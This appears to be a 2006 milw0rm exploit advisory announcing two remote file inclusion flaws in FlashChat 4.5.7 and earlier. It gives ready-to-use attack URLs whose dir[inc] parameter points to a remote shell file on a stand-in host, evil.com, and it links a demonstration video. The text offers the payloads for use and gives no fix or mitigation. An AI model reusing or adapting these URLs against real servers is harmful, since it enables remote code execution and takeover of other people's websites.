FlashChat <= 4.5.7 Remote File Include Vulnerability

[mc.nadz@xxxxxxxxx]

NeXtMaN <mc.nadz [at] gmail.com>

Here are 2 RFI vulnerabilities in Flashchat i've found:

Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?

video here:

Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html

# milw0rm.com [2006-09-04]